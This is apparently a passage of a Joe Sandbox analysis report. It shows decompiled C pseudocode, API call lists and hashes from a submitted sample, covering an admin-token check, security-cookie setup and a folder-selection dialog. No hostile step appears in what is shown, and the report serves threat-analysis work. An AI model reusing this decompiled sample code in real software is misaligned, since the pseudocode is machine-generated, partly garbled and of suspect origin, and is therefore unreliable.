                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                        • String ID: SeShutdownPrivilege
                                                                                                                                                                                                        • API String ID: 2795981589-3733053543
                                                                                                                                                                                                        • Opcode ID: 6e5faa95dbae971791a7038045e92336af6fdbd927300b5f3057d74c69843256
                                                                                                                                                                                                        • Instruction ID: 320ef0b0adb9aa3b16214eecbdf5be2da06bb3e1c3fe4a4b59f03a813d7bed78
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e5faa95dbae971791a7038045e92336af6fdbd927300b5f3057d74c69843256
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8321A6B1B402056EEB207BA29C4AFBB76BCEF85B14F141069FB0EF6181D77488469761
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 57%
                                                                                                                                                                                                        			E00E817EE(intOrPtr* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				short _v12;
                                                                                                                                                                                                        				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                        				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                        				void* _v24;
                                                                                                                                                                                                        				intOrPtr* _v28;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				_Unknown_base(*)()* _t20;
                                                                                                                                                                                                        				long _t28;
                                                                                                                                                                                                        				void* _t35;
                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				signed int _t38;
                                                                                                                                                                                                        				intOrPtr* _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t14 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				_v8 = _t14 ^ _t38;
                                                                                                                                                                                                        				_v12 = 0x500;
                                                                                                                                                                                                        				_t37 = __ecx;
                                                                                                                                                                                                        				_v16.Value = 0;
                                                                                                                                                                                                        				_v28 = __ecx;
                                                                                                                                                                                                        				_t28 = 0;
                                                                                                                                                                                                        				_t36 = LoadLibraryA("advapi32.dll");
                                                                                                                                                                                                        				if(_t36 != 0) {
                                                                                                                                                                                                        					_t20 = GetProcAddress(_t36, "CheckTokenMembership");
                                                                                                                                                                                                        					_v20 = _t20;
                                                                                                                                                                                                        					if(_t20 != 0) {
                                                                                                                                                                                                        						 *_t37 = 0;
                                                                                                                                                                                                        						_t28 = 1;
                                                                                                                                                                                                        						if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v24) != 0) {
                                                                                                                                                                                                        							_t37 = _t39;
                                                                                                                                                                                                        							 *0xe8a288(0, _v24, _v28);
                                                                                                                                                                                                        							_v20();
                                                                                                                                                                                                        							if(_t39 != _t39) {
                                                                                                                                                                                                        								asm("int 0x29");
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							FreeSid(_v24);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					FreeLibrary(_t36);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00E86CE0(_t28, _t28, _v8 ^ _t38, _t35, _t36, _t37);
                                                                                                                                                                                                        			}



















                                                                                                                                                                                                        0x00e817f6
                                                                                                                                                                                                        0x00e817fd
                                                                                                                                                                                                        0x00e81805
                                                                                                                                                                                                        0x00e8180b
                                                                                                                                                                                                        0x00e8180d
                                                                                                                                                                                                        0x00e81815
                                                                                                                                                                                                        0x00e81818
                                                                                                                                                                                                        0x00e81820
                                                                                                                                                                                                        0x00e81824
                                                                                                                                                                                                        0x00e8182c
                                                                                                                                                                                                        0x00e81832
                                                                                                                                                                                                        0x00e81837
                                                                                                                                                                                                        0x00e81851
                                                                                                                                                                                                        0x00e81854
                                                                                                                                                                                                        0x00e8185d
                                                                                                                                                                                                        0x00e81862
                                                                                                                                                                                                        0x00e8186c
                                                                                                                                                                                                        0x00e81872
                                                                                                                                                                                                        0x00e81877
                                                                                                                                                                                                        0x00e8187e
                                                                                                                                                                                                        0x00e8187e
                                                                                                                                                                                                        0x00e81883
                                                                                                                                                                                                        0x00e81883
                                                                                                                                                                                                        0x00e8185d
                                                                                                                                                                                                        0x00e8188a
                                                                                                                                                                                                        0x00e8188a
                                                                                                                                                                                                        0x00e818a2

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00E818DD), ref: 00E8181A
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00E8182C
                                                                                                                                                                                                        • AllocateAndInitializeSid.ADVAPI32(00E818DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00E818DD), ref: 00E81855
                                                                                                                                                                                                        • FreeSid.ADVAPI32(?,?,?,?,00E818DD), ref: 00E81883
                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,00E818DD), ref: 00E8188A
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                        • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                        • API String ID: 4204503880-1888249752
                                                                                                                                                                                                        • Opcode ID: 648b3c6fa7f8222472892f282861510884fea01b7970b61615bdbeaf5879dba9
                                                                                                                                                                                                        • Instruction ID: 6ef39ce32a6e247c9657b8484f0741805dcd4dc377ef93d62468ddeeadce05bb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 648b3c6fa7f8222472892f282861510884fea01b7970b61615bdbeaf5879dba9
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80119671E00209AFEB14AFA5DC4AABEBB78EF44700F14016AFA0DF2290DA309D058791
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E86CF0(char _a4) {
                                                                                                                                                                                                        
                                                                                                                                                                                                        				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                        				_t1 =  &_a4; // 0xe86e26
                                                                                                                                                                                                        				UnhandledExceptionFilter( *_t1);
                                                                                                                                                                                                        				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                        			}



                                                                                                                                                                                                        0x00e86cf7
                                                                                                                                                                                                        0x00e86cfd
                                                                                                                                                                                                        0x00e86d00
                                                                                                                                                                                                        0x00e86d19

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00E86E26,00E81000), ref: 00E86CF7
                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(&n,?,00E86E26,00E81000), ref: 00E86D00
                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(C0000409,?,00E86E26,00E81000), ref: 00E86D0B
                                                                                                                                                                                                        • TerminateProcess.KERNEL32(00000000,?,00E86E26,00E81000), ref: 00E86D12
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                        • String ID: &n
                                                                                                                                                                                                        • API String ID: 3231755760-661210962
                                                                                                                                                                                                        • Opcode ID: ed486db0fc49553d4656a74c014f27c9b0990a3a174d6c27754d04d6f57694dd
                                                                                                                                                                                                        • Instruction ID: 3b1daf1aa5239f92d3c24871e1f9d648f17eb68f46500a1cf1ed3801a8a313e0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed486db0fc49553d4656a74c014f27c9b0990a3a174d6c27754d04d6f57694dd
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9BD0C9B2001108BFFB002BE2EC0CA693F28EB48612F4C4022F31DA2020CA3644558B52
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00E87155() {
                                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                                        				struct _FILETIME _v16;
                                                                                                                                                                                                        				signed int _v20;
                                                                                                                                                                                                        				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                        				signed int _t23;
                                                                                                                                                                                                        				signed int _t36;
                                                                                                                                                                                                        				signed int _t37;
                                                                                                                                                                                                        				signed int _t39;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                                                                                                                                                                                                        				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                                                                                                                                                                                                        				_t23 =  *0xe88004; // 0x18391fe1
                                                                                                                                                                                                        				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                                                                                                                                                                                                        					GetSystemTimeAsFileTime( &_v16);
                                                                                                                                                                                                        					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentProcessId();
                                                                                                                                                                                                        					_v8 = _v8 ^ GetCurrentThreadId();
                                                                                                                                                                                                        					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                                                                                                                                                                                                        					QueryPerformanceCounter( &_v24);
                                                                                                                                                                                                        					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                                                                                                                                                                                                        					_t39 = _t36;
                                                                                                                                                                                                        					if(_t36 == 0xbb40e64e || ( *0xe88004 & 0xffff0000) == 0) {
                                                                                                                                                                                                        						_t36 = 0xbb40e64f;
                                                                                                                                                                                                        						_t39 = 0xbb40e64f;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *0xe88004 = _t39;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t37 =  !_t36;
                                                                                                                                                                                                        				 *0xe88008 = _t37;
                                                                                                                                                                                                        				return _t37;
                                                                                                                                                                                                        			}











                                                                                                                                                                                                        0x00e8715d
                                                                                                                                                                                                        0x00e87161
                                                                                                                                                                                                        0x00e87165
                                                                                                                                                                                                        0x00e87178
                                                                                                                                                                                                        0x00e87182
                                                                                                                                                                                                        0x00e8718e
                                                                                                                                                                                                        0x00e87197
                                                                                                                                                                                                        0x00e871a0
                                                                                                                                                                                                        0x00e871b1
                                                                                                                                                                                                        0x00e871b8
                                                                                                                                                                                                        0x00e871c4
                                                                                                                                                                                                        0x00e871c7
                                                                                                                                                                                                        0x00e871cb
                                                                                                                                                                                                        0x00e871d5
                                                                                                                                                                                                        0x00e871da
                                                                                                                                                                                                        0x00e871da
                                                                                                                                                                                                        0x00e871dc
                                                                                                                                                                                                        0x00e871dc
                                                                                                                                                                                                        0x00e871e2
                                                                                                                                                                                                        0x00e871e5
                                                                                                                                                                                                        0x00e871ee

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00E87182
                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00E87191
                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00E8719A
                                                                                                                                                                                                        • GetTickCount.KERNEL32 ref: 00E871A3
                                                                                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00E871B8
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000000.00000002.430849344.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000000.00000002.430840109.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430860781.0000000000E88000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000000.00000002.430893986.0000000000E8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_e80000_iOqzwbUlln.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1445889803-0
                                                                                                                                                                                                        • Opcode ID: a535554ced4188ce74aaedb3c2edcd57798d6e94545b113108c6989c0f7d6b72
                                                                                                                                                                                                        • Instruction ID: 6940f62e103a3be2392c7790e9614b36be8a6d396a75393e38ad8f8daaeb248a
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a535554ced4188ce74aaedb3c2edcd57798d6e94545b113108c6989c0f7d6b72
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4B111C71D06208DFDB10DFB9DA4CA9EBBF5EF48315FA54866D809F7214EB349A088B41
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E00E83210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* _t6;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				int _t20;
                                                                                                                                                                                                        				int _t21;
                                                                                                                                                                                                        				int _t23;
                                                                                                                                                                                                        				char _t24;
                                                                                                                                                                                                        				long _t25;
                                                                                                                                                                                                        				int _t27;
                                                                                                                                                                                                        				int _t30;
                                                                                                                                                                                                        				void* _t32;
                                                                                                                                                                                                        				int _t33;
                                                                                                                                                                                                        				int _t34;
                                                                                                                                                                                                        				int _t37;
                                                                                                                                                                                                        				int _t38;
                                                                                                                                                                                                        				int _t39;
                                                                                                                                                                                                        				void* _t42;
                                                                                                                                                                                                        				void* _t46;
                                                                                                                                                                                                        				CHAR* _t49;
                                                                                                                                                                                                        				void* _t58;
                                                                                                                                                                                                        				void* _t63;
                                                                                                                                                                                                        				struct HWND__* _t64;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t64 = _a4;
                                                                                                                                                                                                        				_t6 = _a8 - 0x10;
                                                                                                                                                                                                        				if(_t6 == 0) {
                                                                                                                                                                                                        					_push(0);
                                                                                                                                                                                                        					L38:
                                                                                                                                                                                                        					EndDialog(_t64, ??);
                                                                                                                                                                                                        					L39:
                                                                                                                                                                                                        					__eflags = 1;
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t42 = 1;
                                                                                                                                                                                                        				_t10 = _t6 - 0x100;
                                                                                                                                                                                                        				if(_t10 == 0) {
                                                                                                                                                                                                        					E00E843D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                        					SetWindowTextA(_t64, "cent");
                                                                                                                                                                                                        					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                        					__eflags =  *0xe89a40 - _t42; // 0x3
                                                                                                                                                                                                        					if(__eflags == 0) {
                                                                                                                                                                                                        						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L36:
                                                                                                                                                                                                        					return _t42;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				if(_t10 == _t42) {
                                                                                                                                                                                                        					_t20 = _a12 - 1;
                                                                                                                                                                                                        					__eflags = _t20;
                                                                                                                                                                                                        					if(_t20 == 0) {
                                                                                                                                                                                                        						_t21 = GetDlgItemTextA(_t64, 0x835, 0xe891e4, 0x104);
                                                                                                                                                                                                        						__eflags = _t21;
                                                                                                                                                                                                        						if(_t21 == 0) {
                                                                                                                                                                                                        							L32:
                                                                                                                                                                                                        							_t58 = 0x4bf;
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							L25:
                                                                                                                                                                                                        							E00E844B9(_t64, _t58);
                                                                                                                                                                                                        							goto L39;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t49 = 0xe891e4;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t23 =  *_t49;
                                                                                                                                                                                                        							_t49 =  &(_t49[1]);
                                                                                                                                                                                                        							__eflags = _t23;
                                                                                                                                                                                                        						} while (_t23 != 0);
                                                                                                                                                                                                        						__eflags = _t49 - 0xe891e5 - 3;
                                                                                                                                                                                                        						if(_t49 - 0xe891e5 < 3) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t24 =  *0xe891e5; // 0x3a
                                                                                                                                                                                                        						__eflags = _t24 - 0x3a;
                                                                                                                                                                                                        						if(_t24 == 0x3a) {
                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                        							_t25 = GetFileAttributesA(0xe891e4);
                                                                                                                                                                                                        							__eflags = _t25 - 0xffffffff;
                                                                                                                                                                                                        							if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        								L26:
                                                                                                                                                                                                        								E00E8658A(0xe891e4, 0x104, 0xe81140);
                                                                                                                                                                                                        								_t27 = E00E858C8(0xe891e4);
                                                                                                                                                                                                        								__eflags = _t27;
                                                                                                                                                                                                        								if(_t27 != 0) {
                                                                                                                                                                                                        									__eflags =  *0xe891e4 - 0x5c;
                                                                                                                                                                                                        									if( *0xe891e4 != 0x5c) {
                                                                                                                                                                                                        										L30:
                                                                                                                                                                                                        										_t30 = E00E8597D(0xe891e4, 1, _t64, 1);
                                                                                                                                                                                                        										__eflags = _t30;
                                                                                                                                                                                                        										if(_t30 == 0) {
                                                                                                                                                                                                        											L35:
                                                                                                                                                                                                        											_t42 = 1;
                                                                                                                                                                                                        											__eflags = 1;
                                                                                                                                                                                                        											goto L36;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										L31:
                                                                                                                                                                                                        										_t42 = 1;
                                                                                                                                                                                                        										EndDialog(_t64, 1);
                                                                                                                                                                                                        										goto L36;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									__eflags =  *0xe891e5 - 0x5c;
                                                                                                                                                                                                        									if( *0xe891e5 == 0x5c) {
                                                                                                                                                                                                        										goto L31;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									goto L30;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0x10);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_push(0);
                                                                                                                                                                                                        								_t58 = 0x4be;
                                                                                                                                                                                                        								goto L25;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t32 = E00E844B9(_t64, 0x54a, 0xe891e4, 0, 0x20, 4);
                                                                                                                                                                                                        							__eflags = _t32 - 6;
                                                                                                                                                                                                        							if(_t32 != 6) {
                                                                                                                                                                                                        								goto L35;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t33 = CreateDirectoryA(0xe891e4, 0);
                                                                                                                                                                                                        							__eflags = _t33;
                                                                                                                                                                                                        							if(_t33 != 0) {
                                                                                                                                                                                                        								goto L26;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0x10);
                                                                                                                                                                                                        							_push(0);
                                                                                                                                                                                                        							_push(0xe891e4);
                                                                                                                                                                                                        							_t58 = 0x4cb;
                                                                                                                                                                                                        							goto L25;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags =  *0xe891e4 - 0x5c;
                                                                                                                                                                                                        						if( *0xe891e4 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t24 - 0x5c;
                                                                                                                                                                                                        						if(_t24 != 0x5c) {
                                                                                                                                                                                                        							goto L32;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t34 = _t20 - 1;
                                                                                                                                                                                                        					__eflags = _t34;
                                                                                                                                                                                                        					if(_t34 == 0) {
                                                                                                                                                                                                        						EndDialog(_t64, 0);
                                                                                                                                                                                                        						 *0xe89124 = 0x800704c7;
                                                                                                                                                                                                        						goto L39;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t34 != 0x834;
                                                                                                                                                                                                        					if(_t34 != 0x834) {
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t37 = LoadStringA( *0xe89a3c, 0x3e8, 0xe88598, 0x200);
                                                                                                                                                                                                        					__eflags = _t37;
                                                                                                                                                                                                        					if(_t37 != 0) {
                                                                                                                                                                                                        						_t38 = E00E84224(_t64, _t46, _t46);
                                                                                                                                                                                                        						__eflags = _t38;
                                                                                                                                                                                                        						if(_t38 == 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t39 = SetDlgItemTextA(_t64, 0x835, 0xe887a0);
                                                                                                                                                                                                        						__eflags = _t39;
                                                                                                                                                                                                        						if(_t39 != 0) {
                                                                                                                                                                                                        							goto L36;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t63 = 0x4c0;
                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                        						E00E844B9(_t64, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                        						_push(0);
                                                                                                                                                                                                        						goto L38;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t63 = 0x4b1;
                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}

























                                                                                                                                                                                                        0x00e8321b
                                                                                                                                                                                                        0x00e8321e
                                                                                                                                                                                                        0x00e83221
                                                                                                                                                                                                        0x00e8343c
                                                                                                                                                                                                        0x00e8343e
                                                                                                                                                                                                        0x00e8343f
                                                                                                                                                                                                        0x00e83445
                                                                                                                                                                                                        0x00e83447
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83447
                                                                                                                                                                                                        0x00e83229
                                                                                                                                                                                                        0x00e8322a
                                                                                                                                                                                                        0x00e8322f
                                                                                                                                                                                                        0x00e833ec
                                                                                                                                                                                                        0x00e833f7
                                                                                                                                                                                                        0x00e83410
                                                                                                                                                                                                        0x00e83416
                                                                                                                                                                                                        0x00e8341d
                                                                                                                                                                                                        0x00e8342d
                                                                                                                                                                                                        0x00e8342d
                                                                                                                                                                                                        0x00e83438
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83438
                                                                                                                                                                                                        0x00e83237
                                                                                                                                                                                                        0x00e83243
                                                                                                                                                                                                        0x00e83243
                                                                                                                                                                                                        0x00e83246
                                                                                                                                                                                                        0x00e832ee
                                                                                                                                                                                                        0x00e832f4
                                                                                                                                                                                                        0x00e832f6
                                                                                                                                                                                                        0x00e833d4
                                                                                                                                                                                                        0x00e833d6
                                                                                                                                                                                                        0x00e833db
                                                                                                                                                                                                        0x00e833dc
                                                                                                                                                                                                        0x00e833de
                                                                                                                                                                                                        0x00e833df
                                                                                                                                                                                                        0x00e83370
                                                                                                                                                                                                        0x00e83372
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83372
                                                                                                                                                                                                        0x00e832fc
                                                                                                                                                                                                        0x00e83301
                                                                                                                                                                                                        0x00e83301
                                                                                                                                                                                                        0x00e83303
                                                                                                                                                                                                        0x00e83304
                                                                                                                                                                                                        0x00e83304
                                                                                                                                                                                                        0x00e8330a
                                                                                                                                                                                                        0x00e8330d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83313
                                                                                                                                                                                                        0x00e83318
                                                                                                                                                                                                        0x00e8331a
                                                                                                                                                                                                        0x00e83331
                                                                                                                                                                                                        0x00e83332
                                                                                                                                                                                                        0x00e8333a
                                                                                                                                                                                                        0x00e8333d
                                                                                                                                                                                                        0x00e8337c
                                                                                                                                                                                                        0x00e83388
                                                                                                                                                                                                        0x00e8338f
                                                                                                                                                                                                        0x00e83394
                                                                                                                                                                                                        0x00e83396
                                                                                                                                                                                                        0x00e833a4
                                                                                                                                                                                                        0x00e833ab
                                                                                                                                                                                                        0x00e833b6
                                                                                                                                                                                                        0x00e833be
                                                                                                                                                                                                        0x00e833c3
                                                                                                                                                                                                        0x00e833c5
                                                                                                                                                                                                        0x00e83435
                                                                                                                                                                                                        0x00e83437
                                                                                                                                                                                                        0x00e83437
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83437
                                                                                                                                                                                                        0x00e833c7
                                                                                                                                                                                                        0x00e833c9
                                                                                                                                                                                                        0x00e833cc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e833cc
                                                                                                                                                                                                        0x00e833ad
                                                                                                                                                                                                        0x00e833b4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e833b4
                                                                                                                                                                                                        0x00e83398
                                                                                                                                                                                                        0x00e83399
                                                                                                                                                                                                        0x00e8339b
                                                                                                                                                                                                        0x00e8339c
                                                                                                                                                                                                        0x00e8339d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8339d
                                                                                                                                                                                                        0x00e8334c
                                                                                                                                                                                                        0x00e83351
                                                                                                                                                                                                        0x00e83354
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8335c
                                                                                                                                                                                                        0x00e83362
                                                                                                                                                                                                        0x00e83364
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83366
                                                                                                                                                                                                        0x00e83367
                                                                                                                                                                                                        0x00e83369
                                                                                                                                                                                                        0x00e8336a
                                                                                                                                                                                                        0x00e8336b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8336b
                                                                                                                                                                                                        0x00e8331c
                                                                                                                                                                                                        0x00e83323
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83329
                                                                                                                                                                                                        0x00e8332b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e8332b
                                                                                                                                                                                                        0x00e8324c
                                                                                                                                                                                                        0x00e8324c
                                                                                                                                                                                                        0x00e8324f
                                                                                                                                                                                                        0x00e832c8
                                                                                                                                                                                                        0x00e832ce
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e832ce
                                                                                                                                                                                                        0x00e83251
                                                                                                                                                                                                        0x00e83256
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e83271
                                                                                                                                                                                                        0x00e83277
                                                                                                                                                                                                        0x00e83279
                                                                                                                                                                                                        0x00e83298
                                                                                                                                                                                                        0x00e8329d
                                                                                                                                                                                                        0x00e8329f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00e832b0
                                                                                                                                                                                                        0x00e832b6
                                                                                                                                                                                                        0x00e832b8
